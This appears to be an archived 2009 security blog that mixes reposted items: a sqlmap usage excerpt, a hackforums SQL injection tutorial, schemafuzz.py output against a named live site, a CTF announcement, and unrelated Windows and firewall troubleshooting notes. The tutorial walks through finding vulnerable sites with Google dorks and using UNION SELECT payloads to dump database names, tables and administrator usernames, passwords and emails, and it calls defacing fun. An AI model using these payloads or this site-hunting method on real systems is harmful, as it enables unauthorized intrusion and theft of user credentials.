[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic
[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic
[hh:mm:53] [INFO] GET parameter 'today' is dynamic
[hh:mm:54] [INFO] testing sql injection on GET parameter 'today'
[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'
[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'
[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable
[...]

HTTP proxy

Option: --proxy

It is possible to provide an anonymous HTTP proxy address to pass by the HTTP requests to the target URL. The syntax of HTTP proxy value is http://url:port.

Example on a PostgreSQL 8.3.5 target:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
--proxy "http://192.168.1.47:3128"

[hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
[hh:mm:37] [WARNING] the back-end DMBS is not MySQL
[hh:mm:37] [WARNING] the back-end DMBS is not Oracle
back-end DBMS: PostgreSQL

Instead of using a single anonymous HTTP proxy server to pass by, you can configure a Tor client together with Privoxy on your machine as explained on the Tor client guide then run sqlmap as follows:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
--proxy "http://192.168.1.47:8118"

Note that 8118 is the default Privoxy port, adapt it to your settings.

http://sqlmap.sourceforge.net/doc/README.html

Interview Questions for Security/Network/Unix guy

2009-08-01T03:13:00.000-07:00

http://www.techinterviews.com/security-interview-questions-for-network-admin

http://www.geekinterview.com/Interview-Questions/Networking/Networks-and-Security

http://danielmiessler.com/blog/10-questions-to-ask-during-an-information-security-interview

Gathering DNS information

2009-07-23T00:43:00.000-07:00

http://searchdns.netcraft.com/?position=limited&host=facebook.com

rCom's SQLi Tutorial { reMix }

2009-07-14T22:38:00.000-07:00

Contents At A Glance:

1. Introduction(Kinda Pointless)
2. Finding Vulnerable Sites.
3. Getting Number of Columns.
4. Getting MySQL Version.
5. Getting Database Names.
6. Getting Database User.
7. Getting Table Names.
8. Getting Column Names.
9. LIMIT, What is it and why do I need to know it?
10. End Notes

1. Introduction(Kinda Pointless)
First, if you find that I have written something that is wrong, please address it and I will fix it. There is one simple reason why I am writing this paper, mainly because there are so many simple SQL Injection questions that flood this board everyday and people just simple say things like â€œLearn to use the search function.â€, â€œGoogle is your friendâ€, or some other just completely non-helpful remarks. If you aren't going to help someone why reply at all? Just go on to another thread. That doesn't even bring up the number of private messages that I receive daily with questions related to SQL Injection, on a slow day I receive 1-2 private messages, on a normal day I will get up to 10 with questions about SQL, or even â€œWhat is your MSN/Yahoo/AIM/E-Mail, I need help.â€ Most of the time I do try to help as much as I can, but it does get old too. Well, enough ranting here goes.

2. Finding Vulnerable Sites
First you need to know what makes a site vulnerable to SQL Injection before you can find and vulnerable sites.

The most common reason that a site is vulnerable to SQL Injection attacks in because the owner/coder didn't use the built in MySQL feature 'mysql_real_escape_string()'. The purpose of this function is to sanitize or remove special characters from an SQL query. The most common side-effect is the simple Username/Password exploit ' or 1='1. Most website administrators today use this function along with stripslashes() or addslashes() to further sanitize the data.

Well since I gave you a very basic reason for why certain sites are vulnerable we will move onto finding some vulnerable sites to play with.

When talking about finding sites to inject you will hear the term â€œdorkâ€ a lot, what this refers to is a google search term targeted at finding vulnerable websites. A â€œgoogle dorkâ€ uses the built in google functions inurl:, or allinurl: to search for websites that have certain strings in their URL or website address, an example of a google dork is: inurl:index.php?id=1, entering this string into the google search engine would return all of the sites in google's cache with the string index.php?id=1 in their URL, Ex: http://www.example.com/index.php?id=1

Here are some lists of â€œdorksâ€ to use:
http://www.hackforums.net/showthread.php?tid=76925
http://www.hackforums.net/showthread.php?tid=71313
http://go-blog.web.id/?p=3
http://sql-injection-tools.blogspot.com/...hafiq.html

Now that we know what a google dork is we can start finding vulnerable sites. To be vulnerable the site has to have a GET parameter in the URL: index.php?id=1, id=1 being the GET parameter 'gets' the 1 'id' from the SQL database(Understand? Good.)

So you are going to go to http://www.google.com,http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. To do this the most common way is to add a back-tick after one of the integers in the URL
Example: http://www.example.com/index.php?id=1'

Now there are many ways for a site to show you that it is vulnerable the most common are errors:
You have an error in your SQL Syntax
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():

If you receive any of these errors when you enter the ' after the number then chances are the site is vulnerable to SQL Injection attacks to some extent, but that isn't the only way to see if a site is vulnerable, the biggest overlooked error is when a main part of the site just simply disappears, such as a news article or a body of text on the main site. If this happens then it is likely that the site is vulnerable also.

3. Getting Number of Columns
After you find your vulnerable site the first step you need to take is to find the number of columns in the table that is in use. There are a couple of ways that people do this, personally I use the ORDER BY statement, there is also GROUP BY which accomplishes the same thing, but it's just habit. A lot of people use the string AND 1=0 before their queries, most of the time this is just a waste of time to type this out, the only time you need this is if you try ORDER BY 300-- and you don't receive an error, then you would add the and 1=0 to your query.

To find number of columns you start with ORDER BY 1, if it doesn't error then you are good to go, sometimes you will get a syntax error when doing ORDER BY 1 that's why it is important to start there, if you get the syntax error your best bet is to move on to another site. If you don't get an error I always go to ORDER BY 300 to see if I will get an error there, sometimes you could go on for years and never get an error, there can't be 300 columns in the database so you should always get an error. After getting the error on 300 it is up to you how you want to find the number of columns, personally I jump around out of habit I usually do something like this:
Code:
http://www.example.com/index.php?id=1 ORDER BY 1--
no error
http://www.example.com/index.php?id=1 ORDER BY 300--
error
http://www.example.com/index.php?id=1 ORDER BY 10--
error
http://www.example.com/index.php?id=1 ORDER BY 5--
no error
http://www.example.com/index.php?id=1 ORDER BY 6--
error
After this you know that your website has 5 columns because it errors on everything above ORDER BY 5, and doesn't error on anything below ORDER BY 5.

Note on comments: Comments are not always necessary when injecting a website, although sometimes they are, by comments I am referring to the â€“ at the end of the URL.
Possible comments to use are --, /*, /**/, or simply nothing at the end.

4. Getting MySQL Version
Now that we have the number of columns you are going to want to get the version of the database you are working on, this is an important step, because any version lower than 5 you will have to guess table names and column names. I don't recommend working on a database lower than version 5 for beginners, you should get aquanted with SQL Injection first. Before we can get the version you have to find a visible column number. This is where the Injection part really starts. To do this you will use a SELECT statement and the UNION statement. Most people don't understand that these are two completely different SQL statements, the reason you use UNION SELECT is because you are already SELECTing from the database when you are simply visiting the site.
For example: http://www.example.com/index.php?id=1
What this URL is telling the database is SELECT * FROM 'tablenamehere' WHERE id='1';

Now when we add out UNION into that URL we are adding two SQL statements together since our example website has 5 columns this is what our query would look like:

http://www.example.com/index.php?id=1+UNION+SELECT+1,2,3,4,5--

The website should return normal after doing this, if it doesn't and it tells you something like â€œForbiddenâ€ or some other error, then the website doesn't support union statements and you need to move on. If it doesn't error then add a negative sign after the equals sign like this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5--

There is a reason for this people, I've been asked many times why you do this, the reason is when you send this query to the database you are sending something like:
SELECT * FROM 'tablenamehere' WHERE id='-1' AND SELECT 1,2,3,4,5

There isn't a -1 in the id column so the database will return a blank section of the page, but since we have our other SELECT statement in there it will return numbers back in the data's place. Those are our visible columns. For our example we'll say we got back the numbers 2 and 3 so these are the numbers that we can retrieve data from. To get our database version there are two ways either @@version or version(). To use them do this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,@@version,3,4,5--
or
http://www.example.com/index.php?id=-1+UNION+SELECT+1,concat(version()),3,4,5--

If you get an error like â€œIllegal mix of coallations when using @@version you simple have to convert it to latin from UTF8 like so:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--

NOTE: Notice that we completely replace the number 2 with our query, something like union select 1,concat(version()),2,3,4,5-- will not work.

Well if it worked you know now the version of the MySQL database in use you will see something like 5.0.13-log, or 4.0.0.1-delta, there are countless versions and types but all we need to focus on is the first number if it 5 then we are good to go, if it is 4 then if you are new you should move on.

5. Getting Database Names
I haven't seen this covered on any papers on SQL Injection so I will include it because it is an important part of SQL Injection. For novice SQL Injectors ever started to inject a website then find no useful data such as. usernames/passwords? Most likely because the current database in use for the site only holds data like news articles and the like. This is where getting the different database names is important. In version of MySQL higher than 5 there will always be a database named 'information_schema' and most of the time a database named 'test', neither of these hold data that you will need to know, but yet the information_schema database is the reason that injection v5+ databases is so easy.

To get list of databases do this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,group_concat(schema_name),3,4,5+ FROM+information_schema.schemata--
Now where you saw the database version pop up earlier you will see the names of all of the different databases we will say for our example we got back something like this:
information_schema,exampledb,exampledb2,test

If you want to know what the database in use right now do this:
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,concat(database()),3,4,5--
We'll say we got back 'exampledb'.

From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:

Databases:

Tables:

Columns:

So that I can quickly copy and paste in. In my opinion this is a good habit to get into.

6. Getting Database User
Not really necessary but good to know use user():
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,concat(user()),3,4,5--

7. Getting Table Names
I'm going to go a little more in-depth than most tutorials you'll see on the internet here because they aren't very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.

6. To get table names of current database:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5 from information_schema.tables WHERE table_schema=database()--

You will see a list of table names come out, for our example we will say we got:
news, images, ads, links

Wow that looks useful huh? That is information we can get from just looking at the website, so now it's time to get tables from our other database we found earlier 'exampledb2' This is where your best friend the hex converter will come in handy. To get tables from selected databases you have to hex the name.
So we convert exampledb2 to 6578616d706c65646232. Always rember to add the 0x in front of the hexed name to tell the database that it is hex encoded and it need to decode it to get the right name. So our database name ends up being 0x6578616d706c65646232.

Online text-to-hex converters:
http://www.motobit.com/util/binary-file-...string.asp
http://www.string-functions.com/string-hex.aspx
http://home2.paulschou.net/tools/xlate/

Now for the query:

http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=0x6578616d706c65646232--
Notice we change 'database()' to our hexed database name '0x6578616d706c65646232'

For our example we'll say we got back:
newsletter, members, administrators

That's the good stuff, normally you wouldn't have found this information and just moved onto another site.

8. Getting Column Names
This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns:

http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 FROM information_schema.columns WHERE table_schema=database()--

That's gonna give you every column name on the database but you don't want the columns for 'exampledb' remember because there wasn't any useful info in there, you want just the column names from 'exampledb2' because there were member info and admin info in that database. So now you open you Text-to-hex again and hex your database again so 'exampledb2' becomes ' 0x6578616d706c65646232'

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns WHERE table_schema= 0x6578616d706c65646232--
That will only return the column names from that selected database. We'll say we got back:
email, username, password, first_name, last_name

If you remember the table names from exampledb2, which you should because you always paste into notepad right?, you can get the administrators username, password, email address, and full name.
To get this you would do:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password,0x3a,email,0x3a,first_name,0x3a,last_name) ,3,4,5 FROM exampledb2.administrators--

0x3a being the hex value for a colon ':' so that you can easily seperate the information. Sometimes this wont work though, sometimes you have to hex the databasename.tablename (not alot but sometimes) so in that case it would be:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5 from 0x6578616d706c656462322e61646d696e6973747261746f7273--
Which will then give you what you're looking for.

9. LIMIT What is it and why do I need to know it?
Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just wont display them all at one go? Well, this is where you need the LIMIT statement.

For our example we will say we want the emails from the exampledb2.newsletter table, the only column in that table is 'email', probably never be that easy but hey this is an example right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and 1 half cut-off like random.douchebag@gma so how do we get the rest of the 480 emails? This is where your perseverance will come into play, if you want it that bad you would use the LIMIT statement to get them since we already got the first 20 results we'll start at 21 to get the full email address that is cut off:

Code:
http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999--

Note when using limit: You can't use group_concat() it will error, drop the group and just use concat().

The 999999 can be any number higher than the row count in the database I just use that because it is easy. You would do this increasing your number by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999--,limit 23,9999999--,limit 24,9999999--
Yes, it will take a long time to do this, there are tools used to dump databases though, most common used is SQLI Helper, thought this tool is flawed too because it won't increase the last number when limiting if needed.

10. End Notes
Well, that's it. I do hope that I helped at least a few of you. I know it was a long read for those of you that actually went through it all, but I think at least half of the people who read this will learn something new. On another note SQL Injection can be fun to do, defacing websites even more fun sometimes, but you need to know that it is illegal. Here are some things to keep in mind.
[qoute]
Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done.
[/qoute]

The Ten Commandments of Computer Ethics by the Computer Ethics Institute:
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other people's computer work.
3. Thou shalt not snoop around in other people's computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other people's computer resources without authorization or proper compensation.
8. Thou shalt not appropriate other people's intellectual output.
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.
10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.

If I helped, post some feedback, if I didn't PM me with your question and if it warrants an answer I will reply and add that into the tutorial.

Don't forget to RATE my thread. 5 Stars would be nice.
Last minute edition:
Difinitive SQL E-Book Collection
Contents:
The Visibooks Guide to MySQL Basics
Sybex - Mastering MySQL 4
Sams - Teach Yourself Mysql in 10 Minutes
Sams - MySQL Database Design and Tuning
Sams - MySQL Tutorial
Sams - MySQL Phrasebook - Essential Code and Commands
Sams - MySQL Crash Course
Sams - MySQL Certification Study Guide
Sams - MySQL 2nd Edtion
Peachpit Press - Visual Quickstart Guide -MySQL
O'Reilly - MySQL Pocket Refernce
O'Reilly - MySQL in a Nutshell
O'Reilly - MySQL Cookbook
O'Reilly - MySQL and mSQL
O'Reilly - Managing and Using MySQL
O'Reilly - High Performance MySQL
MySQL Press - MySQL Administrator's Guide and Language Reference
McGraw Hill - MySQL Essential Skills

Download Link

Code:
#!/usr/bin/laden -w
use Weapons::Of qw(Mass Destruction);
if ( $home eq "Cave M_of_Nowhere") {
print "I HAZ DE URANIUM\n";
}

http://www.hackforums.net/showthread.php?tid=94738

LAMPSecurity.org Capture the Flag Exercise

2009-06-02T20:14:00.000-07:00

Hello,

I'm happy to announce that the second installment (cryptically called
CTF5) of LAMPSecurity.org's capture the flag series of exercises is now
available. This edition is novel in that it includes a 0-day exploit
that can be used (indirectly) to gain root. This is a training exercise
released in support of the educational mission of LAMPSecurity.org. The
exercise is modeled after many of the exercises that are presented in
expensive commercial training courses, except it's free, of course.
Unlike tools like OWASP's WebGoat, LAMPSecurity.org's capture the flag
exercise consists of a full, vulnerable, virtual machine (VMWare's free
Player is required). This allows users to explore vulnerabilities at
every level of the LAMP stack. The first exercise includes an "attack"
VM as well, with tools pre-installed (where possible). It also includes
over 60 pages of step-by-step documentation so no prior experience is
necessary (although the documentation only outlines one of several
routes to root compromise). The exercise is designed to educate system
administrators and developers on some common dangers and
mis-configurations facing Linux,Apache,MySQL, PHP (LAMP) applications.
Further details, including the documentation, are available at
http://lampsecurity.org/capture-the-flag-5. The vulnerable virtual
machine and attack image are available from SourceForge at
https://sourceforge.net/projects/lampsecurity/. Constructive feedback is
of course welcome. Thank you and enjoy.

- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org

schemafuzz.py by rsauron

2009-05-27T13:12:00.000-07:00

schemafuzz.py -h
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"

schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news.php?id=1--
[+] Evasion Used: "+" "--"
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--
[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3
[-] Done!

schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 --fuzz

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news...c0de,2,3--
[+] Evasion Used: "+" "--"
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web27-gc
User: web27-gc@79.170.40.171
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

Reference:
http://www.hackforums.net/showthread.php?tid=79972

Troubleshooting Connectivity Problems on Windows Networks

2009-05-25T06:43:00.001-07:00

This article series will explain various troubleshooting techniques that you can use when machines on a Windows network have difficulty communicating with each other.

If you would like to be notified when Brien M. Posey releases the next part of this article series please sign up to the WindowsNetworking.com Real time article update newsletter.

Today’s network hardware and software is more reliable than ever but even so, things do occasionally go wrong. In this article series, I am going to discuss some troubleshooting techniques that you can use when a host on your Windows network has trouble communicating with other network hosts. For the sake of those with less experience in working with the TCP/IP protocol, I’m going to start with the basics, and then work toward the more advanced techniques.

Verify Network Connectivity

When one host has trouble communicating with another, the first thing that you must do is to gather some information about the problem. More specifically, you need to document the host’s configuration, find out if the host is having trouble communicating with any other machines on the network, and find out if the problem effects any other hosts.

For example, suppose that a workstation is having trouble communicating with a particular server. That in itself doesn’t really give you a lot to go on. However, if you were to dig a little bit deeper into the problem and found out that the workstation couldn’t communicate with any of the network servers, then you would know to check for a disconnected network cable, a bad switch port, or maybe a network configuration problem.

Likewise, if the workstation were able to communicate with some of the network servers, but not all of them, that too would give you a hint as to where to look for the problem. In that type of situation, you would probably want to check to see what the servers that could not be contacted had in common. Are they all on a common subnet? If so, then a routing problem is probably to blame.

If multiple workstations are having trouble communicating with a specific server, then the problem probably isn’t related to the workstations unless those workstations were recently reconfigured. More than likely, it is the server itself that is malfunctioning.

The point is that by starting out with a few basic tests, you can gain a lot of insight into the problem at hand. The tests that I am about to show you will rarely show you the cause of the problem, but they will help to narrow things down so that you will know where to begin the troubleshooting process.

PING

PING is probably the simplest TCP/IP diagnostic utility ever created, but the information that it can provide you with is invaluable. Simply put, PING tells you whether or not your workstation can communicate with another machine.

The first thing that I recommend doing is opening a Command Prompt window, and then entering the PING command, followed by the IP address of the machine that you are having trouble communicating with. When you do, the machine that you have specified should produce four replies, as shown in Figure A.

Figure A: The specified machine should generate four replies

The responses essentially tell you how long it took the specified machine to respond with thirty two bytes of data. For example, in Figure A, each of the four responses were received in less than four milliseconds.

Typically, when you issue the PING command, one of four things will happen, each of which has its own meaning.

The first thing that can happen is that the specified machine will produce four replies. This indicates that the workstation is able to communicate with the specified host at the TCP/IP level.

The second thing that can happen is that all four requests time out, as shown in Figure B. If you look at Figure A, you will notice that each response ends in TTL=128. TTL stands for Time To Live. What this means is that each of the four queries and responses must be completed within 128 milliseconds. The TTL is also decremented once for each hop on the way back. A hop occurs when a packet moves from one network to another. I will be talking a lot more about hops later on in this series.

Figure B: If all four requests time out, it could indicate a communications failure

At any rate, if all four requests have timed out, it means that the TTL expired before the reply was received. This can mean one of three things:

Communications problems are preventing packets from flowing between the two machines. This could be caused by a disconnected cable, a bad routing table, or a number of other issues.
Communications are occurring, but are too slow for PING to acknowledge. This can be caused by extreme network congestion, or by faulty network hardware or wiring.
Communications are functional, but a firewall is blocking ICMP traffic. PING will not work unless the destination machine’s firewall (and any firewalls between the two machines) allow ICMP echos.
A third thing that can happen when you enter the PING command is that some replies are received, while others time out. This can point to bad network cabling, faulty hardware, or extreme network congestion.

The fourth thing that can occur when pinging a host is that you receive an error similar to the one that is shown in Figure C.

Figure C: This type of error indicates that TCP/IP is not configured correctly

The PING: Transmit Failed error indicates that TCP/IP is not configured correctly on the machine on which you are trying to enter the PING command. This particular error is specific to Vista though. Older versions of Windows produce an error when TCP/IP is configured incorrectly, but the error message is “Destination Host Unreachable”

What if the PING is Successful?

Believe it or not, it is not uncommon for a ping to succeed, even though two machines are having trouble communicating with each other. If this happens, it means that the underlying network infrastructure is good, and that the machines are able to communicate at the TCP/IP level. Typically, this is good news, because it means that the problem that is occurring is not very serious.

If normal communications between two machines are failing, but the two machines can PING each other successfully (be sure to run the PING command from both machines), then there is something else that you can try. Rather than pinging the network host by IP address, try replacing the IP address with the host’s fully qualified domain name, as shown in Figure D.

Figure D: Try pinging the network host by its fully qualified domain name

If you are able to ping the machine by its IP address, but not by its fully qualified domain name, then you most likely have a DNS issue. The workstation may be configured to use the wrong DNS server, or the DNS server may not contain a host record for the machine that you are trying to ping.

If you look at Figure D, you can see that the machine’s IP address is listed just to the right of its fully qualified domain name. This proves that the machine was able to resolve the fully qualified domain name. Make sure that the IP address that the name was resolved to is correct. If you see a different IP address than the one that you expected, then you may have an incorrect DNS host record.

Conclusion

In this article, I have shown you some steps for testing basic connectivity between two machines. In the next article in the series, I will show you some more techniques that you can use in the troubleshooting process.

**************************************************
Published: Aug 14, 2008
Updated: Sep 26, 2008
Section: Articles & Tutorials :: Network Troubleshooting
Author: Brien M. Posey
Rating: 3.6/5 - 32 Votes
If you would like to read other parts to this article please go to:

Troubleshooting Connectivity Problems on Windows Networks (Part 2)
Troubleshooting Connectivity Problems on Windows Networks (Part 3)
Troubleshooting Connectivity Problems on Windows Networks (Part 4)
Troubleshooting Connectivity Problems on Windows Networks (Part 5)

http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html

http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html

20 ways to php Source code fuzzing (Auditing)

2009-04-25T01:38:00.000-07:00

20 ways to php Source code fuzzing (Auditing)

Hello .

This article is only for who attend php as well and really knowing how to program In PHP.

When we talk about PHP Vulnerability discovery, we forget this Question:
What types of bugs?

When we can answer this Question, we will gain to find vulnerability as well as drink some water.

Reading in this article :

Section 1 : (20 ways to PHP source code Auditing - PHP Fuzzing)
1- Cross Site Scripting
2- SQL Injection [medium]
3- HTTP Response Splitting [Medium]
4- Dynamic Evaluation Vulnerabilities [High]
5- Process Control / PHP Code Injection (HIGH)
6- Local / Remote file inclusion (High)
7 – File Management (HIGH)
8- Buffer overflows (High, But Hard Usage)
9- Cookie / Session injection / Fixation / [High]
10 – Denial Of service [Medium, But Hard Assessment]:
11 - XPath Injection [XML Functions]
12 - Often Misused: File Uploads (High)
13 - Un-Authorize summon of Functionality / File (Medium)
14 - Authentication Bypass with Brute Force (Low)
15 - Insecure Randomness Session / Cookie / Backup files (Medium)
16 - Informative details in HTML Comments (Low)
17 - Default unnecessary installation files (medium)
18 – Regular Expression Vulnerability (High)
19 – Resource Injection (Medium)
20 – Week Password / Encryption: (Low)

Section 2:
Automatic PHP Auditor source code

This article is not a full reference about PHP source code security review (a.k.a auditing) but I tried to do this work in my short time as well. So please take my apology about all of mistakes (maybe) I made during completing this article. I’m not sure but maybe I’ve release future version of this article that contain a few more advanced methods.

Here is some of future talk and topics may I add this article in next version:
1- More Real world Attack with Description
2- PHPIDS Defense.
3- More Dangerous Functions: CURL – socket – creat_function & ….
4- Talk About pear functions and security of used.
5- Information About Books of PHP Securea Coding.
6- And ETC

Download :

php-fuzzing-auditing-version-1.0

thanks.

Daphne

http://abysssec.com/blog/2009/03/php_fuzz_audit/

Information Gathering

2009-04-20T18:52:00.000-07:00

New School Information New School Information Gathering Gathering
http://www.toorcon.org/tcx/17_Gates.pdf
@
http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf

Information Gathering: The Complete Documentation
http://www.l0t3k.org/security/docs/gathering/

Passive Information Gathering Techniques
http://seclists.org/basics/2004/Feb/0073.html

Caffe Latte attack

2009-04-19T00:00:00.000-07:00

http://www.security-freak.net/toorcon/cafe-latte-wireless-attack.html

The Caffe Latte Attack: How It Works—and How to Block It
By Lisa Phifer
December 12, 2007

http://www.wi-fiplanet.com/tutorials/article.php/3716241

http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

Wireless Attacks and Penetration Testing

2009-04-18T23:50:00.000-07:00

Wireless Attacks and Penetration Testing (part 1 of 3)
Jonathan Hassell 2004-06-03
http://www.securityfocus.com/infocus/1783

Wireless Attacks and Penetration Testing (part 2 of 3)
Jonathan Hassell 2004-06-14
http://www.securityfocus.com/infocus/1785

Wireless Attacks and Penetration Testing (part 3 of 3)
Jonathan Hassell 2004-07-26
http://www.securityfocus.com/infocus/1792

Figure 1: Sniffing packets with AirSnort

Checkpoint Firewall - IPSO Standard Health Check

2009-03-28T17:49:00.000-07:00

GUI = Smart View Monitor

CLI as below

fw stat
cpstat fw
cphaprob stat

to check the HA state

For Nokia Box, run

clish
show vrrp

Checkpoint Firewall - Fw Monitor

2009-03-27T18:30:00.000-07:00

[PDF]
How to use fw monitor
http://www.checkpoint.com/techsupport/downloads/html/ethereal/fw_monitor_rev1_01.pdf

[DOC]
FW MONITOR
www.cpug.org/check_point_resources/FW%20MONITOR_expert.doc

[PDF]
Fw Monitor
www.nokia.com/NOKIA_COM_1/About_Nokia/Press/White_Papers/pdf_files/technicalwhitepaper_fwmonitoring.pdf

grep pix log

2009-03-27T03:12:00.000-07:00

cat pix.log | grep "Sep 26 20:" | grep -v Teardown | grep -v Built| grep -v Deny | grep -v Accessed| grep -v access-list | grep -v Inbound | grep -v Deny | grep -v Accessed| grep -v access-list | grep "PIX-1-"

Cisco Pix Firewall - Standard Health Check

2009-03-26T19:13:00.000-07:00

sh fail

- untuk cek yg mana primary atau secondary yg tengah active atau standby
- bila tarikh last failover
- cek status sume fw interface

2.

sh conn count

- cek bape byk bilangan connection, kalau banyak betulla tu fw tengah pass traffic

3.

sh conn

- nak tengok connection

4.

sh mem

- cek fw memory

5.

sh cpu usage

- cek fw cpu utilization

6.

sh int

- cek sume interface kat fw

Vulnerability Assessment for SQL Injection

2009-03-07T19:57:00.000-08:00

Online Tools - SQL Injection

2009-02-14T21:10:00.000-08:00

One of my student just copy paste everything from here for their wireless assignment.. got u! :P

http://technet.microsoft.com/en-us/library/bb457019.aspx

2.4GHz vs. 5GHz Deployment Considerations

2009-02-14T17:24:00.000-08:00

When deploying a wireless LAN, companies must make a decision on whether to use network interface cards (NICs) and access points designed to operate in the 2.4GHz or 5GHz band (or both). Not too long ago the choice of frequency band was easy, when only 2.4GHz (i.e., 802.11b) products were available. Now, 802.11b and 802.11g products are both available that operate in the 2.4GHz band, while 802.11a use the 5GHz band. This can cause confusion when designing a WLAN, so let's take a look at what you need to consider when making this critical resolution.

http://www.wi-fiplanet.com/tutorials/article.php/1569271

Wireless threats, vulnerabilities and solution

2009-02-08T20:19:00.000-08:00

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

